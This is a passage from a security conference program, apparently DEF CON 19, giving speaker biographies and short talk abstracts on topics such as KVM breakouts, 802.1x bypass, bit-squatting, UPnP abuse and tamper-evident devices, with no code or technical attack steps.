James Arlen , CISA, sometimes known as Myrcurial is a cyber-security cyber-consultant usually found in tall buildings wearing a cyber-suit, founder of the Think|Haus hackerspace, columnist at Liquidmatrix Security Digest, Infosec Geek, Hacker, Social Activist, Author, Speaker and Parent. He's been at this security game for more than 15 years and loves blinky lights and shiny things. Cyber.



Joshua Corman is the Research Director for Enterprise Security at The 451 Group and founder of RuggedSoftware.org. A passionate advocate for the security practitioner, he is known for his candor, intellectual honesty, and willingness to challenge the status quo - tackling topics like his 7 Dirty Secrets of the Security Industry and Is PCI the No Child Left Behind Act for Security?



Alex Hutton likes risk, critical thinking, and data. He writes for newschoolsecurity.com dub cloud.com, and Verizon's security blog.



Martin McKeay is the host and author of the Network Security Blog and Podcast. He is a well known expert in the field of PCI and has worked as a QSA for over four years; he's seen the security compliance can encourage, as well as the lengths people will go to in order to avoid implementing real security. He is an advocate for PCI and compliance while recognizing it's limitation, a dichotomy that sometimes threatens his sanity.



Dave Shackleford is a SANS Analyst, instructor and GIAC technical director. He has consulted with hundreds of organizations in the areas of regulatory compliance, security, and network architecture and engineering. He's worked as CSO for Configuresoft, CTO for the Center for Internet Security, and has also worked as a security architect, analyst, and manager for several Fortune 500 companies.

return to top

Former Keynotes - The Future

Former keynotes keep coming back to DEFCON. Join The Dark Tangent, Rod Beckstrom, Jerry Dixon, Tony Sager, and Linton Wells to discuss the future of cyber security.



Dark Tangent Bio to Come



Rod Beckstrom is a highly successful entrepreneur, founder and CEO of a publicly-traded company, a best-selling author, avowed environmentalist, public diplomacy leader and, most recently, the head of a top-level federal government agency entrusted with protecting the nation's communication networks against cyber attack. Throughout 2008, Rod served as the Director of the National Cybersecurity Center (NCSC) at the U.S. Department of Homeland Security, where he reported to the Secretary of DHS, and was charged with cooperating directly with the Attorney General, National Security Council, Secretary of Defense, and the Director of National Intelligence (DNI). Prior to joining DHS, he served on the DNI's Senior Advisory Group. Rod is unique in having experienced the inner workings of two, highly-charged, often competing, federal security agencies created in the wake of the September 11th attacks, an event that he says, "changed my life."



Rod is widely regarded as a pre-eminent thinker and speaker on issues of cybersecurity and related global issues, as well as on organizational strategy and leadership. He is also an expert on how carbon markets and "green" issues affect business. While Director of the NCSC, Rod developed an effective working group of leaders from the nation's top six cybersecurity centers across the civilian, military and intelligence communities. His work led to his development of a new economic theory that provides an explicit model for valuing any network, answering a decades-old problem in economics. Rod co-authored four books including The Starfish and the Spider: The Unstoppable Power of Leaderless Organizations, a best-selling model for analyzing organizations, leadership styles, and competitive strategy. The Starfish and the Spider has been translated into 16 foreign editions and is broadly quoted.



At age 24, Rod started his first company in a garage apartment and, subsequently, grew it into a global enterprise with offices in New York, London, Tokyo, Geneva, Sydney, Palo Alto, Los Angeles, and Hong Kong. CATS Software Inc., went public and later sold. Nobel Laureates Myron Scholes and William F. Sharpe served on the company's boards of directors and advisors. While at CATS Rod helped advance the financial theory of "value at risk," now used globally for all key banking risk management. Rod co-edited the first book to introduce "value at risk." Rod also co-founded Mergent Systems, a pioneer in inferential database engines, which Commerce One later acquired for $200 million. He has co-launched other collaborations, software, and internet service businesses, as well. From 1999 to 2001, he served as Chairman of Privada, Inc, a leader in technology enabling private, anonymous, and secure credit card transactions over the internet.



In 2003, Rod co-founded a global peace network of CEO's which initiated Track II diplomatic efforts between India and Pakistan. The group's symbolic actions opened the borders to people and trade, and contributed to ending the most recent Indo-Pak conflict. It's one of several non-profit groups and initiatives Rod has started. He now serves on the boards of the Environmental Defense Fund, which Fortune Magazine ranked as one of the seven most powerful boards in the world and Jamii Bora Trust an innovative micro-lending group in Africa with more than 200,000 members. He is a graduate of Stanford University with an MBA and a BA with Honors and Distinction. He served as Chairman of the Council of Presidents of the combined Stanford student body (ASSU) and was a Fulbright Scholar at the University of St. Gallen in Switzerland. Rod commenced as President and CEO of ICANN on 1 July 2009.



Jerry Dixon Jerry Dixon currently serves as Director of Analysis for Team Cymru and was the former Director of the National Cyber Security Division (NCSD) & US-CERT, of the Department of Homeland Security. He continues to advise partners on national cyber-security threats, aides organizations in preparing for cyber-attacks, and assists with the development of cyber-security policies for organizations.



Tony Sager is the Chief of the Vulnerability Analysis and Operations (VAO) Group within the Information Assurance Directorate at the National Security Agency. VAO's mission is to identify and analyze the vulnerability of information, technology, and operations for NSA customers, primarily within the Defense Department and the Intelligence Community. VAO is also very active in helping the broader national security community deal with these same problems through guidance and standards. VAO has received recognition from several private sector sources (including SC Magazine Editor's Choice for 2007; and The National Information Security Leadership Award from Government Executive Magazine and the SANS Institute).



During his 30 year career at the NSA, Tony has held a number of technical and managerial positions in Computer/Network Security and software analysis. He holds a BA in Mathematics from Western Maryland College and an MS in Computer Science from the Johns Hopkins University. Tony is also a graduate of the US Army Signal Officer Basic Course (as a civilian), and the National Security Leadership Course. He is a frequent keynote speaker and panelist at national and international security events.



Linton Wells II is the Director of the Center for Technology and National Security Policy (CTNSP) at National Defense University (NDU). He also is a Distinguished Research Professor and serves as the University's Transformation Chair. Prior to coming to NDU he served in the Office of the Secretary of Defense (OSD) from 1991 to 2007, serving last as the Principal Deputy Assistant Secretary of Defense (Networks and Information Integration). In addition, he served as the Acting Assistant Secretary and DoD Chief Information Officer for nearly two years. His other OSD positions included Principal Deputy Assistant Secretary of Defense (Command, Control, Communications and Intelligence-C3I) and Deputy Under Secretary of Defense (Policy Support) in the Office of the Under Secretary of Defense (Policy).



In twenty-six years of naval service, Dr. Wells served in a variety of surface ships, including command of a destroyer squadron and guided missile destroyer. In addition, he acquired a wide range of experience in operations analysis; Pacific, Indian Ocean and Middle East affairs; and C3I. Recently he has been focusing on STAR-TIDES, a research project focusing on sustainable support to populations under stress and public-private interoperability (www.star-tides.net).



Dr. Wells was born in Luanda, Angola, in 1946. He was graduated from the United States Naval Academy in 1967 and holds a Bachelor of Science degree in physics and oceanography. He attended graduate school at The Johns Hopkins University, receiving a Master of Science in Engineering degree in mathematical sciences and a PhD in international relations. He is also a 1983 graduate of the Japanese National Institute for Defense Studies in Tokyo, the first U.S. naval officer to attend there.



Dr. Wells has written widely on security studies in English and Japanese journals. He co-authored Japanese Cruisers of the Pacific War, which was published in 1997. His hobbies include history, the relationship between policy and technology, and scuba diving. He has thrice been awarded the Department of Defense Medal for Distinguished Public Service.

return to top

Introduction to Tamper Evident Devices

Tamper evident technologies are quickly becoming an interesting topic for hackers around the world. DEF CON 18 (2010) held the first ever "Tamper Evident" contest, where contestants were given a box sealed with a variety of tamper evident devices, many of which purport to be "tamper proof." All of these devices were defeated, even by those with little experience and a limited toolkit. Like the computer world, many of these devices are overmarketed and it is difficult for the average person to compare different tamper evident technologies.



This talk covers the design and uses of tamper evident devices used in the commercial and government sectors. We'll dig into the nitty gritty of how many of these devices work, the methods by which they can be defeated, and live demonstrations of defeats against common tamper evident devices. Be advised: this talk is for only the stealthiest of ninjas; pirates need not apply.



datagram has taught about locks, safes, and methods to compromise them for many years, including training to private companies and government agencies. He has spoken many times on physical and digital security at various conferences and is a part-time forensic locksmith. datagram runs the popular lock and security websites lockwiki.com and lockpickingforensics.com. datagram is the leader of "The Motherfucking Professionals," the team that won the first Tamper Evident contest at DEF CON 18.

return to top

VDLDS — All Your Voice Are Belong To Us

Anytime you want to bypass the system, you tend to have a telephone conversation instead of leaving a paper trail. Data Leakage Prevention (DLP) is on top of the list for most organizations, be it financial or medical industry. In order to overcome this issue we need to devise a new system that can monitor phone conversations. Voice Data Leakage Detection System can be used for tracking Credit card, social security numbers, along with other PII data. An extension of this can be used for tracking Accounting and Financial information that leaves the organization before the information is actually public. This will help spot the people leaking insider information to traders, competitors and other news sources. By utilizing a signature system, each environment can quickly capture sensitive information like Acquisition/Sale of organization, or honeypot data to find the insider leaks.



Ganesh Devarajan is the Sr. Security Architect within Go Daddy's Security Research Team. His focuses are Web Applications security, Malware Analysis, Reputation Service and Cloud security.



Ganesh has a wide variety of experience in his field. Prior to joining Go Daddy in 2010, he worked as a security researcher for the TippingPoint DVLabs and THECASE Research Center in Syracuse, NY. He has publications in a variety of fields, ranging from Supervisory Control and Data Acquisition (SCADA) Securities, Role Based Access Control (RBAC), Wireless Securities and Runtime Software Application patches. His talks have been presented at various venues, including RSA, Department of Defense (DoD) Cybercrime conference, Computer Security Convention DEFCON, LayerOne, Reboot, National Petrochemicals & Refiners Association (NPRA), SMi, Hawaii International Conference on Social Sciences (HICSS), International Information Security Conference (IFIP/SEC) and Hacker Halted.



Don LeBert currently works as a Security Engineer for GoDaddy.com Inc. He has been working with hosting providers for the past 5 years filling the role of Networking Administrator, Server Administrator and Server Manager. Don currently holds a Bachelors degree in Information Systems and Masters degree in Information Security.

return to top

Safe to Armed in Seconds: A Study of Epic Fails of Popular Gun Safes

Hackers like guns. Hackers like locks. Hackers like to tinker with guns and locks. And, most of the time, hackers protect their guns with high-quality locks. However, while it's one thing to own a nice gun safe protected by a high security dial, that sort of solution tends to be best for the firearms that one doesn't have in daily use. Many of us who wear a firearm as part of our daily routine opt to store and secure our carry piece in a separate, more easily-accessible way at the end of the day. This talk is an in-depth evaluation of some of the most popular small firearm lockboxes in-use today. Some rely on mechanical locks, others on biometric locks, and some offer a combination of both. But overall, they tend to fail miserably in the face of any dedicated attacker. Come and learn how your favorite gun lockbox might be preventing your toddler from having an accidental discharge, but why it's not at all likely to repel a criminal or even perhaps a curious teenager. Means of both attacking as well as improving upon the lockboxes you already may own will be demonstrated, and audience members will be invited to participate in all sorts of attacks... live and on stage!



Deviant Ollam's first and strongest love has always been teaching. A graduate of the New Jersey Institute of Technology's Science, Technology, & Society program, he is always fascinated by the interplay that connects human values and social trends to developments in the technical world. While earning his BS degree at NJIT, Deviant also completed the History degree program at Rutgers University.



While paying the bills as a security auditor and penetration testing consultant with The CORE Group, Deviant is also a member of the Board of Directors of the US division of TOOOL, The Open Organisation Of Lockpickers. Every year at DEFCON and ShmooCon Deviant runs the Lockpicking Village, and he has conducted physical security training sessions at Black Hat, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, CanSecWest, ekoparty, and the United States Military Academy at West Point. His favorite Amendments to the US Constitution are, in no particular order, the 1st, 2nd, 9th, & 10th.

Twitter: @DeviantOllam

return to top

Whitfield Diffie and Moxie Marlinspike

Come watch Whitfield Diffie and Moxie Marlinspike talk about certificate authorities, DNSSEC, SSL, dane, trust agility and whatever else they want to. Moderated by the Dark Tangent and with Q&A from the audience.





return to top

Bit-squatting: DNS Hijacking Without Exploitation

We are generally accustomed to assuming that computer hardware will work as described, barring deliberate sabotage. This assumption is mistaken. Poor manufacturing, errant radiation, and heat can cause malfunction. Commonly, such malfunction DRAM chips manifest as flipped bits. Security researchers have known about the danger of such bit flips but these attacks have not been very practical. Thanks to ever-higher DRAM densities and the use of computing devices outdoors and in high-heat environments, that has changed. This presentation will show that far from being a theoretical nuisance, bit flips pose a real attack vector. First the presentation will describe bit-squatting, an attack akin to typo-squatting, where an attacker controls domains one bit away from a commonly queried domain (e.g. mic2osoft.com vs. microsoft.com). To verify the seriousness of the issue, I bit-squatted several popular domains, and logged all HTTP and DNS traffic. The results were shocking and surprising, ranging from misdirected DNS queries to requests for Windows updates. The presentation will show an analysis of 6 months of real DNS and HTTP traffic to bit-squatted domains. The traffic will be shown in terms of affected platform, domain queried, and HTTP resources requested. Using this data the presentation will also attempt to ascertain the cause of the bit-flip, such as corruption on the wire, in requestor RAM, or in the RAM of a third party. The presentation will conclude with potential mitigations of bit-squatting and other bit-flip attacks, including both hardware and software solutions. By the end I hope to convince the audience that bit-squatting, and other attacks enabled by bit-flip errors are practical and serious, and should be addressed by software and hardware vendors.



Artem Dinaburg currently works as a security researcher at Raytheon, investigating a broad range of security related topics. Prior to joining Raytheon, Artem worked as a security researcher building automated malware analysis systems, investigating web-based exploit kits, and identifying botnet command-and-control domains. While a graduate student at Georgia Tech he created hypervisor-based dynamic malware analysis platforms under Dr. Wenke Lee.

return to top

A Bridge Too Far: Defeating Wired 802.1x with a Transparent Bridge Using Linux

Using Linux and a device with 2 network cards, I will demonstrate how to configure an undetectable transparent bridge to inject a rogue device onto a wired network that is secured via 802.1x using an existing authorized connection. I will then demonstrate how to set up the bridge to allow remote interaction and how the entire process can be automated, creating the ultimate drop and walk away device for physical penetration testers and remote testers alike.



Alva 'Skip' Duckwall has been using Linux back before there was a 1.0 kernel and has since moved into the information security arena doing anything from computer/network auditing, to vulnerability assessments and penetration testing. Skip currently holds the following certs: CISSP, CISA, GCIH, GCIA, GCFW, GPEN, GWPT, GCFA, GSEC, RHCE, and SCSA and is working on getting his GSE. Skip currently works for Northrop Grumman as a Sr. Cyber Something or other.

return to top

Virtualization under attack: Breaking out of KVM

KVM, the Linux Kernel Virtual Machine, seems destined to become the dominant open-source virtualization solution on Linux. Virtually every major Linux distribution has adopted it as their standard virtualization technology for the future. And yet, to date, remarkably little work has been done on exploiting vulnerabilities to break out of KVM.



We're here to fix that. We'll take a high-level look at KVM's architecture, comparing and contrasting with other virtualization systems and describing attack surfaces and possible weaknesses. Using the development of a fully-functioning exploit for a recent KVM vulnerability, we'll describe some of the difficulties involved with breaking out of a VM, as well as some features of KVM that are helpful to an exploit author.



Once we've explored the exploit in detail, we'll finish off with a demonstration against a live KVM instance.



Nelson Elhage is a kernel hacker for Ksplice, Inc., where he works on providing rebootless security updates for the Linux kernel. In his spare time, he mines for bugs in the Linux kernel and other pieces of open-source systems software.



@nelhage

return to top

I Am Not a Doctor but I Play One on Your Network

How secure is your Protected Health Information? This talk will expose the world of Health Information Systems with an in depth technical review of their common protocols and technologies. Many of these life-critical systems had once relied on the security provided by air gapped medical networks. Recently, in an effort to realize savings and further share health information, medical systems have moved onto interconnected networks, opening them up to a plethora of attacks. We believe these systems have not had adequate research performed against them due to high cost and relatively low availability. Our talk will not only reveal weaknesses we have discovered in medical protocols but will create a foundation of knowledge for researchers who want to continue investigation of these systems. We will release findings and vulnerabilities that were discovered during the course of this research as well as fuzzers designed to allow penetration testers and researchers to further assess healthcare specific protocols for security vulnerabilities. We will take a look at healthcare specific hardware and discuss vulnerabilities related to these devices including prescription dispensing drug cabinets and the ability to dispense scheduled substances without authentication, authorization, or accounting. Finally, we will discuss how the impact of vulnerabilities on healthcare systems have changed with the introduction of large health information repositories such as the Google Health and Microsoft Health Vault as well as with countless regional and national Health Information Exchanges.



Tim Elrod and Stefan Morris have a combined experience of over 10 years works specifically in the healthcare industry assessing health information systems for security vulnerabilities. Together they have audited and discovered vulnerabilities in most major healthcare specific protocols in use by health care providers today.

return to top

Mamma Don't Let Your Babies Grow Up to be Pen Testers - (a.k.a. Everything Your Guidance Counselor Forgot to Tell You About Pen Testing)

Always wanted to be a 1337 penetration tester capable of deciphering Kryptos while simultaneously developing your own custom 0-days? Then this is NOT the talk for you. We will however make you laugh by presenting an honest look at the life and times of a penetration tester today. We promise to open your eyes to aspects of the job you may have not considered before (at least we hadn't considered them before we started). Drawn from personal experience, this talk will focus on the myths and realities of penetration testing as a "for-sale" service. We love being penetration testers but we're pretty sure the guidance counselor forgot to mention there was a dark side to all the fun. We got the job with a little knowledge, a couple of lamer exploits, and high expectations. We expected firewalls and IDS to be the only thing standing between us and our beloved shells, but it turns out something far more sinister waited for us. Deadlines, timelines, reporting, scope, budgets, and chubby fingers quickly reared their ugly heads and threatened to smash our dreams. Like all PT'ers before us, we soon found out how important each of these topics are and what a critical role they play in our day-to-day activities. Join us for a unique and humorous 20-minute presentation as we air the dirty laundry about the mechanics of penetration testing and open your eyes to the untold aspects of best job on earth.



Dr. Pat Engebretson is an Assistant Professor of Information Assurance at Dakota State University in Madison, SD. He teaches graduate and undergraduate classes in penetration testing, operating system security, and programming. Dr. Engebretson also serves as a Senior Penetration Tester for a Security consulting company in the Midwest. Before returning to academia, Dr. Engebretson spent 5 years as a Network Security Office for a financial institution. He recently published a book on the basics of hacking and penetration testing for Syngress and he works non-stop to weave past experiences into the classroom, integrate hands-on material, and open his student's eyes to the wonders of DEF CON.

Twitter: pengebretson



Dr. Josh Pauli is an Associate Professor of Information Assurance at Dakota State University in Madison, SD where he teaches graduate and undergraduate courses in web and software security. His background is in software engineering and information systems. Dr. Pauli first attended DEF CON 16 (friggin' n00b) and was hooked immediately - he has spent every waking moment since then trying to figure out how to inject DEF CON into DSU's security program and bring his students to DEF CON 19 and beyond!

Twitter: CornDogGuy

return to top

Steganography and Cryptography 101

There are a lot of great ways to hide your data from prying eyes this talk will give a crash course in the technology and some tools that can be used to secure your data. Will also discuss hiding your files in plain site so an intruder will have no idea that hidden files even exist. These same techniques can also be employed by somebody wishing to transmit messages.



Eskimo (Neil Weitzel) is a Technology Analyst for Indiana University. At IU he works for Research System and Decision Support where he performs various to provide a solid infrastructure and secure environment for researchers. Outside of employment Eskimo also does freelance work. He is an avid scripter and automationist.

@neiltxc

AIM: NeilTXC

facebook.com/neiltxc

return to top

Don't Drop the SOAP: Real World Web Service Testing for Web Hackers

Over the years web services have become an integral part of web and mobile applications. From critical business applications like SAP to mobile applications used by millions, web services are becoming more of an attack vector than ever before. Unfortunately, penetration testers haven't kept up with the popularity of web services, recent advancements in web service technology, testing methodologies and tools. In fact, most of the methodologies and tools currently available either don't work properly, are poorly designed or don't fully test for real world web service vulnerabilities. In addition, environments for testing web service tools and attack techniques have been limited to home grown solutions or worse yet, production environments.



In this presentation Tom, Josh and Kevin will discuss the new security issues with web services and release an updated web service testing methodology that will be integrated into the OWASP testing guide, new Metasploit modules and exploits for attacking web services and a open source vulnerable web service for the Samurai-WTF (Web Testing Framework) that can be used by penetration testers to test web service attack tools and techniques.



Tom Eston is a Senior Security Consultant for SecureState. Tom is a senior member of SecureState's Profiling team, which provides attack and penetration testing services for SecureState's clients. Tom focuses much of his research on new technologies such as social media and mobile devices. He is the founder of SocialMediaSecurity.com which is an open source community dedicated to exposing the insecurities of social media. Tom is also a security blogger, co-host of the Security Justice and Social Media Security podcasts and is a frequent speaker at security user groups and national conferences including Notacon, OWASP AppSec, DEFCON and ShmooCon.



Twitter: @agent0x0



Joshua "Jabra" Abraham joined Rapid7 in 2006 as a Security Consultant. Josh has extensive IT Security and Auditing experience and worked as an enterprise risk assessment analyst for Hasbro Corporation. Josh specializes in penetration testing, web application security assessments, wireless security assessments, and custom code development. He has spoken at BlackHat, DEFCON, ShmooCon, The SANS Pentest Summit, Infosec World, CSI, OWASP Conferences, LinuxWorld, Comdex and BLUG. In his spare time, he contributes code to open source security projects such as the BackTrack LiveCD, BeEF, Nikto, Fierce, and PBNJ. He is frequently quoted in the media regarding Microsoft Patch Tuesday and web application security by ComputerWorld, DarkReading and SC Magazine.



Twitter: @jabra



Kevin Johnson is a security consultant and founder of Secure Ideas. Kevin came to security from a development and system administration background. He has many years of experience performing security services for fortune 100 companies, and in his spare time he contributes to a large number of open source security projects. Kevin's involvement in open-source projects is spread across a number of projects and efforts. He is the founder of many different projects and has worked on others. He founded BASE, which is a Web front-end for Snort analysis. He also founded and continues to lead the SamuraiWTF live DVD. This is a live environment focused on Web penetration testing. He also founded Yokoso and Laudanum, which are focused on exploit delivery. Kevin is a certified instructor for SANS and the author of Security 542: Web Application Penetration Testing and Ethical Hacking. He also presents at industry events, including DEFCON and ShmooCon, and for various organizations, like Infragard, ISACA, ISSA, and the University of Florida.



Twitter: @secureideas

return to top

"Get Off of My Cloud": Cloud Credential Compromise and Exposure

An Amazon Machine Image (AMI) is a virtual appliance container used to create virtual machines (VMs) within the Amazon Elastic Compute Cloud (EC2). EC2 instances typically interact with a variety of Amazon Web Services (AWS), and as such require access to AWS credentials and private key materials. In this presentation we will explore how AWS credentials and keys may end up being persisted within an AMI. If persisted within a public or shared AMI, these credentials and key materials may be unintentionally shared with 3rd parties. We will discuss the different types of AWS credentials and key materials, how they are used to access different Cloud services, and the risks and potential impacts of compromise of this sensitive information. A new tool, "AMIexposed" will be released that can check an AMI for the most common ways AWS credentials and keys are persisted within an AMI. The results of research using AMIexposed against public AMIs will be presented, helping to quantify the scope and prevalence of AWS credentials and keys exposed within public AMIs. We'll also discuss the risks inherent in trusting public AMIs to be free of backdoors, trojans, and other malicious hitchhikers. Results of an experiment demonstrating these risks will be presented. Finally, the talk will propose best practices for utilizing AMIs. These will include specific steps for ensuring you organization's AWS credentials and key materials are not unintentionally persisted within public or shared AMIs, and recommendations regarding usage of 3rd party public AMIs.



Ben Feinstein is Director of CTU Operations & Analysis with the Dell SecureWorks Counter Threat Unit (CTU). Ben is an author of RFC 4765 and RFC 4767, and has over a decade of experience designing, implementing and operationalizing security-related information systems. His major areas of expertise include network IDS/IPS, digital forensics and incident response, and security operations. Ben has previously presented at Black Hat USA, DEF CON, ToorCon, DeepSec, the U.S. Department of Defense Cyber Crime Conference, and many other events. He is active in his local DEF CON group, DC404.



Jeff Jarmoc: A first time DEF CON presenter, Jeff has been hacking most of his life. He got his start in the early days of the 312 BBS scene, moved on to IRC and USENET, and eventually pursued a career in enterprise infrastructure and security. His latest passion is abusing ubiquitous infrastructure devices and systems in an attempt to bring renewed focus on the security of these systems everyone has come to rely on. Jeff has previously spoken at Black Hat USA. When not abusing software and hardware he enjoys spending time with his wife and daughter.

Twitter: @jjarmoc

return to top

Handicapping the US Supreme Court: Can We Get Rich by Forceful Browsing?

Using only script-kiddie skills, it may be possible to handicap the outcome of decisions of national importance. This talk presents a walk-though of a project to make more accurate predictions of US Supreme Court case outcomes. That could be a useful thing, if you had something at stake. Conventional techniques for predicting outcomes rely on legal expertise and knowledge of the policy issues at stake in a case and the justices' voting records. Forget all that: we're going to see what we can do with perl and XML transcripts of oral arguments. It's only 20 minutes of your life, but it might equip you to astound your lawyer friends, or make some canny investments.



For nearly fifteen years, Foofus has worked in network security, spending most of that time leading the charming and intelligent foofus.net team of penetration testers. Prior research has dealt with software security and trust relationships between systems in large networked environments. In more recent times, Foofus has been enjoying law school, and in particular, finding ways to apply hacker techniques to legal studies.

return to top

Getting F***** On the River

Online poker is a multi-million dollar industry that is rapidly growing, but is not highly regulated. There have been "hacks" recently (i.e. weak SSL implementation, superuser account) that have drawn more attention to security in the poker industry, especially as it moves to full regulation in the United States. This talk will cover the technical architecture of online poker, existing security controls, examples of past vulnerabilities, new weaknesses we have discovered in the poker clients and surrounding infrastructure, and next steps of research we are performing in this area.



Mr. Fritschie has been involved in the field of information security for over ten years. He began his career in information technology (IT) as a system administrator for a growing financial company. It was there that he gained a fundamental understanding of all aspects of IT, including network security. Mr. Fritschie then joined the information security consulting practices of KPMG, Deloitte and Touche leading and performing numerous vulnerability assessments and penetration tests in support of financial audits, GISRA (now FISMA), and other compliance related efforts. Clients included fortune 500 companies, civilian agencies, and DOD. Since joining SeNet as the Director of Engineering and Security Assessments, Gus has led several large-scale projects. Some of these projects included enterprise-wide vulnerability assessments for multiple government and commercial clients, management of the Certification and Accreditation efforts, and web application penetration tests. He is also an avid poker player having logged close to a million hands online.



Mike Wright is a senior security engineer who specializes in penetration testing, web application assessments, and breaking stuff. For the past three years, Mike has assisted in enterprise-wide vulnerability assessments as well as C&A engagements for several of SeNet's clients.

return to top

Cellular Privacy: A Forensic Analysis of Android Network Traffic

People inherently trust their phones, but should they? "Cellular Privacy: A Forensic Analysis of Android Network Traffic" is a presentation of results from forensically analyzing the network traffic of an Android phone. The results paint an interesting picture. Is Google more trustworthy than the application developers? Are legitimate market apps more trustworthy than their rooted counterparts? Perhaps most importantly, should you trust your passwords, location, and data to a device that shares too much?



Eric Fulton is the Director of Research for Lake Missoula Group, LLC, and a specialist in network penetration testing and web application assessments . In his spare time Eric works with local University students to provide hands-on security training, and conducts independent security research. Eric also publishes network forensics contests on ForensicsContest.com

return to top

UPnP Mapping

Universal Plug and Play(UPnP) is a technology developed by Microsoft in 1999, as a solution for NAT traversal(among other things). This talk explores the exploiting of port mapping services in UPnP/IGD devices from the WAN. It also talks about a tool called Umap to help process the UPnP requests. Attacking UPnP allows attackers to use devices as a proxy that can establish connections to internal and external IP addresses. The software allows scanning internal hosts behind the device NAT, manual port-mapping(WAN to LAN, WAN to WAN) and a SOCKSv4 proxy service that automatically maps requests to UPnP devices. Most UPnP attacks have focused on the exploiting of UPnP from the LAN side of the device, this talk focuses on attacking from the WAN side. Attackers can use these techniques to hide IP addresses and attack internal hosts behind common household gateway devices.



Daniel Garcia (FormateZ on Undernet) is a security researcher/consultant with 15+ years of experience in security. He also founded Toor, a security consultant group that focuses on penetration testing, secure architectures and application assesments.Aside from security, he has also worked with numerous projects and platforms like DOCSIS, Wimax, Wi-Fi(city-wide), PLC and DHE.

return to top

Gone in 60 Minutes: Stealing Sensitive Data from Thousands of Systems Simultaneously with OpenDLP

Got domain admin to a couple of thousand Windows systems? Got an hour to spare? Steal sensitive data from all of these systems simultaneously in under an hour with OpenDLP.



OpenDLP is an open source, agent-based, massively distributable, centrally managed data discovery program that runs as a service on Windows systems and is controlled from a centralized web application. The agent is written in C, has no .NET requirements, uses PCREs for pattern matching, reads inside ZIPs like Office 2007 and OpenOffice files, runs as a low priority service so users do not see or feel it, and securely transmits results to the centralized web application on a regular basis. The web application distributes, installs, and uninstalls agents over SMB; allows you to create reusable profiles, view results in realtime, and mark false positives; and exports results as XML.



OpenDLP also supports scanning databases for sensitive information. It can also perform agentless scans of Windows systems over SMB and UNIX/Linux systems over SSH.



Andrew Gavin creator of OpenDLP, is an information security consultant at Verizon Business. He has more than 11 years of experience in security assessments of networks and applications. He has consulted for numerous customers in various industries around the world.

Twitter: @andrewgavin

return to top

Strategic Cyber Security: An Evaluation of Nation-State Cyber Attack Mitigation Strategies

This presentation argues that computer security has evolved from a technical discipline to a strategic concept. The world's growing dependence on a powerful but vulnerable Internet — combined with the disruptive capabilities of cyber attackers — now threatens national and international security.



Strategic challenges require strategic solutions. The author examines four nation-state approaches to cyber attack mitigation.



•Internet Protocol version 6 (IPv6)

•Sun Tzu's Art of War

•Cyber attack deterrence

•Cyber arms control



The four threat mitigation strategies fall into several categories. IPv6 is a technical solution. Art of War is military. The third and fourth strategies are hybrid: deterrence is a mix of military and political considerations; arms control is a political/technical approach.



The Decision Making Trial and Evaluation Laboratory (DEMATEL) is used to place the key research concepts into an influence matrix. DEMATEL analysis demonstrates that IPv6 is currently the most likely of the four examined strategies to improve a nation's cyber defense posture.



There are two primary reasons why IPv6 scores well in this research. First, as a technology, IPv6 is more resistant to outside influence than the other proposed strategies, particularly deterrence and arms control, which should make it a more reliable investment. Second, IPv6 addresses the most significant advantage of cyber attackers today — anonymity.



Kenneth Geers: PhD, CISSP, Naval Criminal Investigative Service (NCIS), is a Scientist and the U.S. Representative to the NATO Cyber Centre in Tallinn, Estonia. His new book, "Strategic Cyber Security," is a FREE download: http://ccdcoe.org/278.html.

return to top

Bulletproofing The Cloud: Are We Any Closer To Security?

Cloud security has come into focus in the last few years; while many ways to break the cloud have been proposed, few solutions have been put forward. This talk is primarily a conceptual discussion on how cloud providers can and should be (but probably are not) protecting both their own and their clients' assets in their cloud implementations. It will discuss the known issues with cloud, and a readily available proposed solution to some of these issues. The presentation will conclude with a demonstration of an actual implementation of this theory at a cloud hosting provider. An understanding of basic network security technology is required.



Ramon Gomez is a Security Professional working for a cloud hosting provider. He has been working in correlation theory for the last 8 years, including time spent working at a prominent North American vendor of SEIM software, providing theory and logic to improve the correlation capabilities of the product. His primary areas of professional expertise are in correlation theory, and Intrusion Detection/Analysis.

return to top

Smile for the Grenade! "Camera Go Bang!"

Cameras are hugely important to urban and suburban battlefields. Reconnaissance is a must-have for commanders, and a force multiplier for actual combat units. A combat-deployable camera system is being developed or used by nearly every military-industrial manufacturer and government agency, ranging from Throwable Camera Balls to Grenade-style launched cameras. But they're expensive and inaccessible to civilians. Would it be possible to build a combat-deployable camera system that would fulfill the mandates of a tactical combat team, feed information to a strategic command center, and force-multiply "on the cheap"?



Vlad Gostom has over 7 years of experience conducting security consulting and penetration testing in the corporate world. He has worked on such diverse projects as the future warrior combat system, wireless triangulation systems, adaptive IDS/IPS systems, network security/penetration testing for Fortune 50 companies, and physical security assessments for banks.

Twitter: @Recompiler



Joshua Marpet: Security is a complex system, with many disciplines and specialized knowledge. Luckily, there's Josh, who's done everything. Ex-cop, blacksmith, pen testing, video surveillance, sales engineering, and well, everything. And now, technological ordnance developer!

Twitter: @Quadling

return to top

Represent! Defcon Groups, Hackerspaces, and You.

Fabricating, circumventing, forging, partying, milling, crafting, building breaking — Defcon Groups have risen, fallen, and endured the last 8 years as decentralized and smoldering embers of the local hacker think-tank. This year Defcon sets out to stoke that fire and unite our groups, at and outside of the conference. The talk will consist of a panel of Defcon Groups leaders, uncovering the secrets and follies of several groups: what makes them work, when do they fail, and ultimately .. WTF have these people been doing all this time? Come hear how hackerspaces have influenced these local groups and the cool ways that these groups are propping the hackerspace. What can you break?



Anch (DC503) - currently rebooting DC503 after it's near death experience, is a part of the unique hacking scene that is Portland.



blakdayz (DC225) - can pwn sh1t from space, master of a harem, original gangster @ Defcon Voicebridge



Anarchy Angel & ngharo (DC414) - Brew city nerds coming together under the dc414 flag to hack the planet



Itzik Kotler (DC9723) - is killing time till the feds arrive. Meanwhile, he is the CTO of Security Art and co-founder of DC9723. In his former life, he was a Software Engineer. People change. Now, I'm a lamp.



Jake "GenericSuperhero" - Representing Black Lodge Research. Hardware, Software, Wetware, Anywhere, Everywhere.



converge DCG Coordinator, hermit champion of email harassment and slayer of dead hacker groups; you'll probably see his beard wandering the Defcon landscape in search of booze and fun

return to top

Smartfuzzing The Web: Carpe Vestra Foramina

It can be scary to think about how little of the modern attack surface many tools cover. There is no one best tool for the job and on top of that some tools don't do a great job at anything. Often in the hands of general users the capabilities and limitations are not even thought of during testing. Point, click, done. The attack surface of modern web environments as well as their protection mechanisms have become more complicated and yet many tools have not adapted. Hey, Y2K called and it wants some applications tested.



